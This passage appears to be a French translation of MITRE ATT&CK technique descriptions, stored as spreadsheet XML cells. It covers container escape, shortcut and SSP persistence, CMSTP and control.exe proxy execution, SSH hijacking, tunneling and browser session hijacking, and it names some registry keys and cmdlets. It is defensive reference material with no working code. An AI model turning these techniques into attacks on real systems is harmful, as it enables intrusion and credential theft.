Les adversaires peuvent appeler des processus à l’aide de 'nohup', [PowerShell](https://attack.mitre.org/techniques/T1059/001) '-ErrorAction SilentlyContinue' ou de commandes similaires qui peuvent être à l’abri des blocages. (Citation : nohup Linux Man)(Citation : Microsoft PowerShell SilentlyContinue) Cela peut permettre à des commandes malveillantes et à des programmes malveillants de poursuivre leur exécution par le biais d’événements système qui mettraient autrement fin à son exécution, tels que la déconnexion des utilisateurs ou l’arrêt de sa connexion réseau C2.
Le masquage des signaux d’interruption de processus peut permettre au logiciel malveillant de poursuivre son exécution, mais contrairement à [Trap](https://attack.mitre.org/techniques/T1546/005), cela n’établit pas [Persistance](https://attack.mitre.org/tactics/TA0003) puisque le processus ne sera pas réinvoqué une fois terminé.
https://attack.mitre.org/techniques/T1564/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent s’échapper d’un conteneur pour accéder à l’hôte sous-jacent. Cela peut permettre à un adversaire d’accéder à d’autres ressources conteneurisées à partir du niveau de l’hôte ou de l’hôte lui-même. En principe, les ressources conteneurisées doivent fournir une séparation claire des fonctionnalités de l’application et être isolées de l’environnement hôte. (Citation : Présentation de Docker)
Il existe plusieurs façons pour un adversaire de s’échapper vers un environnement hôte. Par exemple, la création d’un conteneur configuré pour monter le système de fichiers de l’hôte à l’aide du paramètre bind, qui permet à l’adversaire de supprimer des charges utiles et d’exécuter des utilitaires de contrôle tels que cron sur l’hôte ; l’utilisation d’un conteneur privilégié pour exécuter des commandes ou charger un module de noyau malveillant sur l’hôte sous-jacent ; ou en abusant des appels système tels que « unshare » et « keyctl » pour élever les privilèges et voler des secrets. (Citation : Docker Bind Mounts)(Citation : Trend Micro Privileged Container)(Citation : Intezer Doki 20 juillet)(Citation : Évasion de conteneur)(Citation : Crowdstrike Kubernetes Container Escape)(Citation : Keyctl-unmask)
De plus, un adversaire peut être en mesure d’exploiter un conteneur compromis avec un socket de gestion de conteneur monté, tel que « docker.sock », pour sortir du conteneur via une [Container Administration Command](https://attack.mitre.org/techniques/T1609). (Citation : Évasion de conteneur) Les adversaires peuvent également s’échapper via [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068), par exemple en exploitant des vulnérabilités dans des liens symboliques globaux afin d’accéder au répertoire racine d’une machine hôte. (citation : les conteneurs Windows Server sont ouverts)
L’accès à l’hôte peut donner à l’adversaire la possibilité d’atteindre des objectifs ultérieurs, tels que l’établissement de la persistance, le déplacement latéral dans l’environnement, l’accès à d’autres conteneurs exécutés sur l’hôte ou la mise en place d’un canal de commande et de contrôle sur l’hôte.
https://attack.mitre.org/techniques/T1611</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des raccourcis qui peuvent exécuter un programme lors du démarrage du système ou de la connexion de l’utilisateur. Les raccourcis ou les liens symboliques sont utilisés pour référencer d’autres fichiers ou programmes qui seront ouverts ou exécutés lorsque le raccourci est cliqué ou exécuté par un processus de démarrage du système.
Les adversaires peuvent abuser des raccourcis dans le dossier de démarrage pour exécuter leurs outils et obtenir la persistance. (Citation : raccourci pour la persistance ) Bien qu’ils soient souvent utilisés comme charges utiles dans une chaîne d’infection (par exemple, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), les adversaires peuvent également créer un nouveau raccourci comme moyen d’indirection, tout en abusant de [Masquerading](https://attack.mitre.org/techniques/T1036) pour faire passer le raccourci malveillant pour un programme légitime. Les adversaires peuvent également modifier le chemin d’accès cible ou remplacer entièrement un raccourci existant afin que leur logiciel malveillant soit exécuté à la place du programme légitime prévu.
Les raccourcis peuvent également être utilisés à mauvais escient pour établir la persistance en mettant en œuvre d’autres méthodes. Par exemple, les extensions de navigateur LNK peuvent être modifiées (par exemple, [Extensions de navigateur](https://attack.mitre.org/techniques/T1176)) pour lancer constamment des logiciels malveillants.
https://attack.mitre.org/techniques/T1547/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste des fenêtres d’application ouvertes. Les listes de fenêtres peuvent transmettre des informations sur la façon dont le système est utilisé. (Citation : Prevailion DarkWatchman 2021) Par exemple, les informations sur les fenêtres d’application pourraient être utilisées pour identifier les données potentielles à collecter ainsi que pour identifier les outils de sécurité ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) à éviter. (Citation : ESET Grandoreiro avril 2020)
Les adversaires abusent généralement des fonctionnalités du système pour ce type d’énumération. Par exemple, ils peuvent recueillir des informations par le biais de fonctionnalités natives du système telles que les commandes [Interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059) et les fonctions [API natives](https://attack.mitre.org/techniques/T1106).
https://attack.mitre.org/techniques/T1010</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’obtenir une liste d’adresses e-mail et de comptes. Les adversaires peuvent essayer de vider les listes d’adresses Exchange telles que les listes d’adresses globales (GAL). (Citation : Listes d’adresses Microsoft Exchange)
Dans Exchange local et Exchange Online, l’applet de commande PowerShell &lt;code&gt;Get-GlobalAddressList&lt;/code&gt; peut être utilisée pour obtenir des adresses e-mail et des comptes à partir d’un domaine à l’aide d’une session authentifiée. (Citation : Microsoft getglobaladdresslist)(Citation : Black Hills attaquant Exchange MailSniper, 2016)
Dans Google Workspace, la liste d’adresses globale est partagée avec les utilisateurs de Microsoft Outlook via le service Google Workspace Sync for Microsoft Outlook (GWSMO). De plus, l’annuaire Google Workspace permet aux utilisateurs d’obtenir une liste des autres utilisateurs de l’organisation. (Référence : Google Workspace Global Access List)
https://attack.mitre.org/techniques/T1087/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser diverses méthodes temporelles pour détecter et éviter les environnements de virtualisation et d’analyse. Cela peut inclure l’énumération de propriétés basées sur le temps, telles que le temps de fonctionnement ou l’horloge système, ainsi que l’utilisation de minuteries ou d’autres déclencheurs pour éviter un environnement de machine virtuelle (VME) ou un bac à sable, en particulier ceux qui sont automatisés ou ne fonctionnent que pendant une durée limitée.
Les adversaires peuvent utiliser diverses évasions basées sur le temps, telles que le report de la fonctionnalité des logiciels malveillants lors de l’exécution initiale à l’aide de commandes de mise en veille programmatiques ou d’une fonctionnalité de planification système native (ex : [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Les retards peuvent également être basés sur l’attente que des conditions spécifiques de la victime soient remplies (par exemple, le temps du système, les événements, etc.) ou l’utilisation de [canaux en plusieurs étapes](https://attack.mitre.org/techniques/T1104) programmés pour éviter l’analyse et l’examen. (Citation : Sensibilisation à l’environnement de Deloitte)
Des commandes bénignes ou d’autres opérations peuvent également être utilisées pour retarder l’exécution de logiciels malveillants. Des boucles ou des répétitions inutiles de commandes, telles que [Ping](https://attack.mitre.org/software/S0097), peuvent être utilisées pour retarder l’exécution de logiciels malveillants et potentiellement dépasser les seuils de temps des environnements d’analyse automatisée. (Citation : Jour de l’indépendance de Revil)(Citation : Netskope Nitol) Une autre variante, communément appelée martèlement d’API, consiste à effectuer divers appels aux fonctions [API natives](https://attack.mitre.org/techniques/T1106) afin de retarder l’exécution (tout en surchargeant potentiellement les environnements d’analyse avec des données indésirables). (Référence : Joe Sec Nymaim)(Citation : Joe Sec Trickbot)
Les adversaires peuvent également utiliser le temps comme mesure pour détecter les bacs à sable et les environnements d’analyse, en particulier ceux qui tentent de manipuler les mécanismes temporels pour simuler des intervalles de temps plus longs. Par exemple, un adversaire peut être en mesure d’identifier un bac à sable accélérant le temps en échantillonnant et en calculant la valeur attendue de l’horodatage d’un environnement avant et après l’exécution d’une fonction de veille. (Citation : Astuces de logiciels malveillants ISACA)
https://attack.mitre.org/techniques/T1497/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de CMSTP pour proxy l’exécution de code malveillant. Le programme d’installation de profil Microsoft Connection Manager (CMSTP.exe) est un programme de ligne de commande utilisé pour installer les profils de service du Gestionnaire de connexions. (Citation : Microsoft Connection Manager octobre 2009) CMSTP.exe accepte un fichier d’informations d’installation (INF) en tant que paramètre et installe un profil de service utilisé pour les connexions d’accès à distance.
Les adversaires peuvent CMSTP.exe fournir des fichiers INF infectés par des commandes malveillantes. (Citation : Utilisation de Twitter CMSTP janvier 2018) Semblable à [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / « Squiblydoo », CMSTP.exe peut être utilisé de manière abusive pour charger et exécuter des DLL (Citation : MSitPros CMSTP Aug 2017) et/ou des scriptlets COM (SCT) à partir de serveurs distants. (Référence : Twitter CMSTP janvier 2018) (Citation : GitHub Ultimate AppLocker Bypass List) (Référence : Endurant CMSTP juillet 2018) Cette exécution peut également contourner AppLocker et d’autres défenses de contrôle des applications, car CMSTP.exe s’agit d’un fichier binaire légitime qui peut être signé par Microsoft.
CMSTP.exe peut également être utilisé de manière abusive pour [Contourner le contrôle de compte d’utilisateur](https://attack.mitre.org/techniques/T1548/002) et exécuter des commandes arbitraires à partir d’un INF malveillant via une interface COM auto-élevée. (Citation : MSitPros CMSTP août 2017) (Citation : GitHub Ultimate AppLocker Bypass List) (Référence : Endurant CMSTP juillet 2018)
https://attack.mitre.org/techniques/T1218/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent détourner la session SSH d’un utilisateur légitime pour se déplacer latéralement dans un environnement. Secure Shell (SSH) est un moyen standard d’accès à distance sur les systèmes Linux et macOS. Il permet à un utilisateur de se connecter à un autre système via un tunnel chiffré, en s’authentifiant généralement par le biais d’un mot de passe, d’un certificat ou de l’utilisation d’une paire de clés de chiffrement asymétrique.
Afin de se déplacer latéralement à partir d’un hôte compromis, les adversaires peuvent tirer parti des relations de confiance établies avec d’autres systèmes via l’authentification par clé publique dans les sessions SSH actives en détournant une connexion existante vers un autre système. Cela peut se produire en compromettant l’agent SSH lui-même ou en ayant accès au socket de l’agent. Si un adversaire est en mesure d’obtenir un accès root, le détournement de sessions SSH est probablement trivial. (Citation : Slideshare abusant de SSH)(Citation : SSHjack Blackhat)(Citation : Détournement d’agent SSH mécanique)(Citation : Violation Post-mortem SSH Hijack)
[Détournement SSH](https://attack.mitre.org/techniques/T1563/001) diffère de l’utilisation de [SSH](https://attack.mitre.org/techniques/T1021/004) car il détourne une session SSH existante plutôt que de créer une nouvelle session à l’aide de [Comptes valides](https://attack.mitre.org/techniques/T1078).
https://attack.mitre.org/techniques/T1563/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent programmer l’exfiltration de données pour qu’elle ne soit effectuée qu’à certaines heures de la journée ou à certains intervalles. Cela peut être fait pour combiner les modèles de trafic avec une activité ou une disponibilité normale.
Lorsque l’exfiltration programmée est utilisée, d’autres techniques d’exfiltration s’appliquent probablement également pour transférer les informations hors du réseau, telles que [Exfiltration sur le canal C2](https://attack.mitre.org/techniques/T1041) ou [Exfiltration sur un protocole alternatif](https://attack.mitre.org/techniques/T1048).
https://attack.mitre.org/techniques/T1029</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour interagir avec un partage réseau distant à l’aide de Server Message Block (SMB). L’adversaire peut alors effectuer des actions en tant qu’utilisateur connecté.
SMB est un protocole de partage de fichiers, d’imprimantes et de ports série pour les machines Windows sur le même réseau ou domaine. Les adversaires peuvent utiliser SMB pour interagir avec les partages de fichiers, ce qui leur permet de se déplacer latéralement sur un réseau. Les implémentations Linux et macOS de SMB utilisent généralement Samba.
Les systèmes Windows ont des partages réseau cachés qui ne sont accessibles qu’aux administrateurs et offrent la possibilité de copier des fichiers à distance et d’autres fonctions administratives. Exemples de partages réseau : « C$ », « ADMIN$ » et « IPC$ ». Les adversaires peuvent utiliser cette technique en conjonction avec des [comptes valides](https://attack.mitre.org/techniques/T1078) de niveau administrateur pour accéder à distance à un système en réseau via SMB, (Citation : Wikipedia Server Message Block) pour interagir avec des systèmes à l’aide d’appels de procédure à distance (RPC),(Citation : TechNet RPC) transférer des fichiers, et exécuter des fichiers binaires transférés via l’exécution à distance. Des exemples de techniques d’exécution qui reposent sur des sessions authentifiées via SMB/RPC sont [Tâche/Travail planifié](https://attack.mitre.org/techniques/T1053), [Exécution de service](https://attack.mitre.org/techniques/T1569/002) et [Instrumentation de gestion Windows](https://attack.mitre.org/techniques/T1047). Les adversaires peuvent également utiliser des hachages NTLM pour accéder aux partages d’administrateur sur les systèmes avec [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) et certains niveaux de configuration et de correctif. (citation : Microsoft Admin Shares)
https://attack.mitre.org/techniques/T1021/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent implanter des images de cloud ou de conteneur avec un code malveillant pour établir la persistance après avoir accédé à un environnement. Les images Amazon Web Services (AWS), Amazon Machine Images (AMI), Google Cloud Platform (GCP) et Azure Images, ainsi que les environnements d’exécution de conteneurs populaires tels que Docker, peuvent être implantés ou dérobés. Contrairement à [Upload Malware](https://attack.mitre.org/techniques/T1608/001), cette technique se concentre sur l’implantation d’une image par des adversaires dans un registre au sein de l’environnement d’une victime. Selon la façon dont l’infrastructure est provisionnée, cela peut fournir un accès persistant si l’outil de provisionnement de l’infrastructure est chargé d’utiliser toujours la dernière image. (Citation : Rhino Labs Cloud Image Backdoor Technique, septembre 2019)
Un outil a été développé pour faciliter la plantation de portes dérobées dans les images de conteneurs de nuages. (Citation : Rhino Labs Cloud Backdoor, septembre 2019) Si un adversaire a accès à une instance AWS compromise et est autorisé à répertorier les images de conteneur disponibles, il peut implanter une porte dérobée telle qu’un [Web Shell](https://attack.mitre.org/techniques/T1505/003). (Citation : Rhino Labs Cloud Image Backdoor Technique, septembre 2019)
https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>Les adversaires peuvent tunneliser les communications réseau vers et depuis un système victime au sein d’un protocole distinct pour éviter la détection/le filtrage du réseau et/ou permettre l’accès à des systèmes autrement inaccessibles. Le tunneling consiste à encapsuler explicitement un protocole dans un autre. Ce comportement peut dissimuler le trafic malveillant en se fondant dans le trafic existant et/ou fournir une couche externe de cryptage (similaire à un VPN). Le tunneling peut également permettre le routage de paquets réseau qui n’atteindraient pas leur destination prévue, tels que SMB, RDP ou d’autres trafics qui seraient filtrés par des appliances réseau ou qui ne seraient pas acheminés via Internet. 
Il existe différentes façons d’encapsuler un protocole dans un autre protocole. Par exemple, les adversaires peuvent effectuer un tunneling SSH (également connu sous le nom de transfert de port SSH), qui implique le transfert de données arbitraires via un tunnel SSH crypté. (Citation : Tunneling SSH) 
[Tunneling de protocole](https://attack.mitre.org/techniques/T1572) peut également être abusé par des adversaires pendant la [Résolution dynamique](https://attack.mitre.org/techniques/T1568). Connu sous le nom de DNS over HTTPS (DoH), les requêtes visant à résoudre l’infrastructure C2 peuvent être encapsulées dans des paquets HTTPS chiffrés. (Citation : BleepingComp Godlua JUL19) 
Les adversaires peuvent également exploiter le [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) en conjonction avec le [Proxy](https://attack.mitre.org/techniques/T1090) et/ou le [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003) pour dissimuler davantage les communications et l’infrastructure C2.
https://attack.mitre.org/techniques/T1572</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de control.exe pour l’exécution par proxy de charges utiles malveillantes. Le processus binaire (control.exe) du Panneau de configuration Windows gère l’exécution des éléments du Panneau de configuration, qui sont des utilitaires qui permettent aux utilisateurs d’afficher et d’ajuster les paramètres de l’ordinateur.
Les éléments du Panneau de configuration sont des fichiers exécutables (.exe) ou .cpl enregistrés du Panneau de configuration, ces derniers étant en fait des fichiers de bibliothèque de liens dynamiques (.dll) renommés qui exportent une fonction &lt;code&gt;CPlApplet&lt;/code&gt;. (Citation : Microsoft implémentant CPL)(Citation : TrendMicro CPL Malware janvier 2014) Pour faciliter l’utilisation, les éléments du Panneau de configuration incluent généralement des menus graphiques disponibles pour les utilisateurs après avoir été enregistrés et chargés dans le Panneau de configuration. (Citation : Microsoft implémentant CPL) Les éléments du Panneau de configuration peuvent être exécutés directement à partir de la ligne de commande, par programmation via un appel d’interface de programmation d’application (API) ou en double-cliquant simplement sur le fichier. (Citation : Microsoft implémentant CPL) (Citation : TrendMicro CPL Malware janvier 2014)(Citation : TrendMicro CPL Malware décembre 2013)
Les éléments malveillants du panneau de configuration peuvent être diffusés via des campagnes [Phishing](https://attack.mitre.org/techniques/T1566) (Citation : TrendMicro CPL Malware Jan 2014)(Citation : TrendMicro CPL Malware Dec 2013) ou exécutés dans le cadre d’un malware en plusieurs étapes. (Citation : Palo Alto Reaver novembre 2017) Les éléments du Panneau de configuration, en particulier les fichiers CPL, peuvent également contourner les listes d’applications et/ou d’extensions de fichiers autorisées.
Les adversaires peuvent également renommer les fichiers DLL malveillants (.dll) avec les extensions de fichier du Panneau de configuration (.cpl) et les enregistrer dans &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls&lt;/code&gt;. Même lorsque ces DLL enregistrées ne sont pas conformes à la spécification du fichier CPL et n’exportent pas les fonctions &lt;code&gt;CPlApplet&lt;/code&gt;, elles sont chargées et exécutées via son &lt;code&gt;DllEntryPoint&lt;/code&gt; lors de l’exécution du Panneau de configuration. Les fichiers CPL qui n’exportent pas &lt;code&gt;CPlApplet&lt;/code&gt; ne sont pas directement exécutables. (Citation : ESET InvisiMole, juin 2020)
https://attack.mitre.org/techniques/T1218/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent franchir les limites du réseau en modifiant la configuration NAT (Network Address Translation) d’un périphérique réseau. Les modifications malveillantes apportées au NAT peuvent permettre à un adversaire de contourner les restrictions sur le routage du trafic qui séparent autrement les réseaux approuvés et non approuvés.
Les périphériques réseau tels que les routeurs et les pare-feu qui connectent plusieurs réseaux peuvent implémenter NAT pendant le processus de transmission de paquets entre les réseaux. Lors de l’exécution de NAT, le périphérique réseau réécrit les adresses source et/ou de destination de l’en-tête de l’adresse IP. Certaines conceptions de réseau nécessitent un NAT pour que les paquets traversent le périphérique frontalier.  Un exemple typique de cela est les environnements où les réseaux internes utilisent des adresses non routables sur Internet. (Référence : RFC1918)
Lorsqu’un adversaire prend le contrôle d’un périphérique de limite de réseau, il peut soit exploiter les configurations NAT existantes pour envoyer le trafic entre deux réseaux séparés, soit mettre en œuvre des configurations NAT de sa propre conception.  Dans le cas de conceptions de réseau qui nécessitent un NAT pour fonctionner, cela permet à l’adversaire de surmonter les limitations de routage inhérentes qui l’empêcheraient normalement d’accéder aux systèmes protégés derrière le périphérique de bordure.  Dans le cas de conceptions de réseau qui ne nécessitent pas de NAT, la traduction d’adresses peut être utilisée par les adversaires pour masquer leurs activités, car la modification des adresses des paquets qui traversent un périphérique de frontière réseau peut rendre la surveillance des transmissions de données plus difficile pour les défenseurs.  
Les adversaires peuvent utiliser [Patch System Image](https://attack.mitre.org/techniques/T1601/001) pour modifier le système d’exploitation d’un périphérique réseau, en mettant en œuvre leurs propres mécanismes NAT personnalisés afin de masquer davantage leurs activités
https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent télécharger des outils sur une infrastructure tierce ou contrôlée par l’adversaire pour les rendre accessibles pendant le ciblage. Les outils peuvent être open source ou fermés, gratuits ou commerciaux. Les outils peuvent être utilisés à des fins malveillantes par un adversaire, mais (contrairement aux logiciels malveillants) n’ont pas été conçus pour être utilisés à ces fins (ex : [PsExec](https://attack.mitre.org/software/S0029)). Les adversaires peuvent télécharger des outils pour soutenir leurs opérations, par exemple en mettant un outil à la disposition d’un réseau victime pour permettre le [transfert d’outils d’entrée](https://attack.mitre.org/techniques/T1105) en le plaçant sur un serveur Web accessible sur Internet.
Les outils peuvent être placés sur une infrastructure qui a déjà été achetée/louée par l’adversaire ([Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583)) ou qui a été compromise par celui-ci ([Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)). (Référence : Dell TG-3390) Les outils peuvent également être mis en scène sur des services web, tels qu’un dépôt GitHub contrôlé par un adversaire, ou sur des offres Platform-as-a-Service qui permettent aux utilisateurs de provisionner facilement des applications. (Citation : Trou d’eau de Dragos Heroku)(Citation : Malwarebytes Heroku Skimmers)(Citation : Intezer App Service Phishing)
Les adversaires peuvent éviter d’avoir à télécharger un outil en demandant aux machines victimes compromises de télécharger l’outil directement à partir d’un emplacement d’hébergement tiers (par exemple, un dépôt GitHub non contrôlé par l’adversaire), y compris le site d’hébergement d’origine de l’outil.
https://attack.mitre.org/techniques/T1608/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des fournisseurs de support de sécurité (SSP) pour exécuter des DLL au démarrage du système. Les DLL SSP Windows sont chargées dans le processus LSA (Local Security Authority) au démarrage du système. Une fois chargées dans le LSA, les DLL SSP ont accès aux mots de passe chiffrés et en texte brut qui sont stockés dans Windows, tels que le mot de passe de domaine ou les codes confidentiels de carte à puce de tout utilisateur connecté.
La configuration SSP est stockée dans deux clés de registre : &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; et &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. Un adversaire peut modifier ces clés de registre pour ajouter de nouveaux SSP, qui seront chargés au prochain démarrage du système ou lors de l’appel de la fonction d’API Windows AddSecurityPackage. (Citation : Graeber 2014)
https://attack.mitre.org/techniques/T1547/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser d’autres éléments d’authentification, tels que des hachages de mot de passe, des tickets Kerberos et des jetons d’accès aux applications, afin de se déplacer latéralement dans un environnement et de contourner les contrôles d’accès au système normaux. 
Les processus d’authentification nécessitent généralement une identité valide (par exemple, un nom d’utilisateur) ainsi qu’un ou plusieurs facteurs d’authentification (par exemple, un mot de passe, un code PIN, une carte à puce physique, un générateur de jetons, etc.). Un autre élément d’authentification est légitimement généré par les systèmes après qu’un utilisateur ou une application s’est authentifié avec succès en fournissant une identité valide et le ou les facteurs d’authentification requis. D’autres éléments d’authentification peuvent également être générés au cours du processus de création de l’identité. (Citation : Authentification NIST)(Citation : NIST MFA)
La mise en cache d’un autre matériel d’authentification permet au système de vérifier qu’une identité a été authentifiée avec succès sans demander à l’utilisateur de saisir à nouveau le ou les facteurs d’authentification. Étant donné que l’authentification alternative doit être conservée par le système, en mémoire ou sur disque, elle peut être exposée au risque d’être volée par le biais des techniques [Credential Access](https://attack.mitre.org/tactics/TA0006). En volant d’autres éléments d’authentification, les adversaires sont en mesure de contourner les contrôles d’accès au système et de s’authentifier auprès des systèmes sans connaître le mot de passe en clair ou tout autre facteur d’authentification.
https://attack.mitre.org/techniques/T1550</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données privées auprès de fournisseurs de renseignements sur les menaces pour trouver des informations qui peuvent être utilisées lors du ciblage. Les fournisseurs de renseignements sur les menaces peuvent proposer des flux payants ou des portails qui offrent plus de données que ce qui est publié publiquement. Bien que des détails sensibles (tels que les noms des clients et d’autres identifiants) puissent être caviardés, ces informations peuvent contenir des tendances concernant des violations telles que les secteurs cibles, les réclamations d’attribution et les TTP/contre-mesures réussies. (Citation : D3Secutrity CTI Feeds)
Les adversaires peuvent effectuer des recherches dans les données privées des fournisseurs de renseignements sur les menaces pour recueillir des informations exploitables. Les auteurs de menace peuvent chercher à obtenir des renseignements ou des indicateurs sur leurs propres campagnes, ainsi que sur celles menées par d’autres adversaires, qui peuvent s’aligner sur leurs secteurs cibles, leurs capacités et leurs objectifs ou sur d’autres préoccupations opérationnelles. Les informations rapportées par les fournisseurs peuvent également révéler des opportunités d’autres formes de reconnaissance (ex : [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Exploiter une application publique](https://attack.mitre.org/techniques/T1190) ou [Externe distant Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1597/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’exfiltrer des données sur un support de réseau différent de celui du canal de commande et de contrôle. Si le réseau de commande et de contrôle est une connexion Internet filaire, l’exfiltration peut se produire, par exemple, via une connexion WiFi, un modem, une connexion de données cellulaires, Bluetooth ou un autre canal de radiofréquence (RF).
Les adversaires peuvent choisir de le faire s’ils disposent d’un accès ou d’une proximité suffisants, et la connexion peut ne pas être sécurisée ou défendue aussi bien que le canal principal connecté à Internet, car il n’est pas acheminé via le même réseau d’entreprise.
https://attack.mitre.org/techniques/T1011</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder aux fichiers de configuration réseau pour collecter des données sensibles sur l’appareil et le réseau. La configuration réseau est un fichier contenant des paramètres qui déterminent le fonctionnement de l’appareil. L’appareil stocke généralement une copie en mémoire de la configuration pendant son fonctionnement, ainsi qu’une configuration distincte sur un stockage non volatile à charger après la réinitialisation de l’appareil. Les adversaires peuvent inspecter les fichiers de configuration pour révéler des informations sur le réseau cible et sa disposition, le périphérique réseau et ses logiciels, ou identifier des comptes légitimes et des informations d’identification pour une utilisation ultérieure.
Les adversaires peuvent utiliser des outils et des protocoles de gestion courants, tels que SNMP (Simple Network Management Protocol) et SMI (Smart Install), pour accéder aux fichiers de configuration réseau. (Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation : Blog Cisco Legacy Device Attacks) Ces outils peuvent être utilisés pour interroger des données spécifiques à partir d’un référentiel de configuration ou configurer l’appareil pour exporter la configuration en vue d’une analyse ultérieure.
https://attack.mitre.org/techniques/T1602/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur l’identité de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les identités peuvent inclure divers détails, y compris des données personnelles (par exemple, les noms des employés, les adresses e-mail, les réponses aux questions de sécurité, etc.) ainsi que des détails sensibles tels que des informations d’identification ou des configurations d’authentification multifacteur (MFA).
Les adversaires peuvent recueillir ces informations de différentes manières, par exemple par le biais de l’hameçonnage par le biais de [Phishing for Information](https://attack.mitre.org/techniques/T1598). Les informations sur les utilisateurs peuvent également être énumérées par d’autres moyens actifs (c’est-à-dire [l’analyse active](https://attack.mitre.org/techniques/T1595)), tels que l’exploration et l’analyse des réponses des services d’authentification qui peuvent révéler des noms d’utilisateur valides dans un système ou les méthodes MFA autorisées associées à ces noms d’utilisateur. (Citation : GrimBlog Nom d’utilisateurEnum)(Citation : Abus d’obsidienne SSPR 2023) Les informations sur les victimes peuvent également être exposées à des adversaires par le biais d’Internet ou d’autres ensembles de données accessibles (ex : [Médias sociaux](https://attack.mitre.org/techniques/T1593/001) ou [Rechercher des sites Web appartenant aux victimes](https://attack.mitre.org/techniques/T1594)). (Citation : Fuite OPM)(Référence : Registre Deloitte)(Citation : Enregistrer Uber)(Citation : Detectify Slack Tokens)(Citation : Forbes GitHub Creds)(Citation : GitHub truffleHog)(Citation : GitHub Gitrob)(Citation : CNET Leaks)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compromis](https://attack.mitre.org/techniques/T1586)), et/ou l’accès initial (ex : [Phishing](https://attack.mitre.org/techniques/T1566) ou [Comptes valides]( https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier les pare-feu du système afin de contourner les contrôles limitant l’utilisation du réseau. Il peut s’agir de désactiver l’ensemble du mécanisme ainsi que d’ajouter, de supprimer ou de modifier des règles particulières. Cela peut être fait de plusieurs façons en fonction du système d’exploitation, notamment via la ligne de commande, la modification des clés de registre Windows et le Panneau de configuration Windows.
La modification ou la désactivation d’un pare-feu système peut permettre des communications C2 adverses, des mouvements latéraux et/ou l’exfiltration de données qui ne seraient pas autorisés autrement. Par exemple, les adversaires peuvent ajouter une nouvelle règle de pare-feu pour un protocole bien connu (tel que RDP) à l’aide d’un port non traditionnel et potentiellement moins sécurisé (c’est-à-dire [port non standard](https://attack.mitre.org/techniques/T1571)). (Référence : change_rdp_port_conti)
Les adversaires peuvent également modifier les paramètres de mise en réseau de l’hôte qui manipulent indirectement les pare-feu du système, tels que la bande passante de l’interface ou les seuils de demande de connexion réseau. (Citation : Chasseresse BlackCat) Les paramètres liés à l’activation de l’utilisation abusive de divers [Services à distance](https://attack.mitre.org/techniques/T1021) peuvent également modifier indirectement les règles du pare-feu.
https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Un adversaire peut compresser et/ou chiffrer les données collectées avant l’exfiltration. La compression des données peut aider à obscurcir les données collectées et à minimiser la quantité de données envoyées sur le réseau. (Citation : Acte d’accusation du DOJ GRU, juillet 2018) Le chiffrement peut être utilisé pour masquer les informations qui sont exfiltrées ou pour rendre l’exfiltration moins visible lors de l’inspection par un défenseur.
La compression et le chiffrement sont effectués avant l’exfiltration et peuvent être effectués à l’aide d’un utilitaire, d’une bibliothèque tierce ou d’une méthode personnalisée.
https://attack.mitre.org/techniques/T1560</t>
  </si>
  <si>
    <t>Les adversaires peuvent tirer parti des failles de sécurité et des fonctionnalités inhérentes aux logiciels de navigation pour modifier le contenu, modifier les comportements des utilisateurs et intercepter des informations dans le cadre de diverses techniques de piratage de session de navigateur. (citation : Wikipédia Man dans le navigateur)
Par exemple, lorsqu’un adversaire injecte dans un navigateur un logiciel qui lui permet d’hériter des cookies, des sessions HTTP et des certificats clients SSL d’un utilisateur, puis d’utiliser le navigateur comme moyen de pivoter vers un intranet authentifié. (Citation : Cobalt Strike Browser Pivot)(Citation : Extensions Chrome ICEBRG) L’exécution de comportements basés sur le navigateur, tels que le pivotement, peut nécessiter des autorisations de processus spécifiques, telles que &lt;code&gt;SeDebugPrivilege&lt;/code&gt; et/ou des droits d’intégrité/d’administrateur élevés.
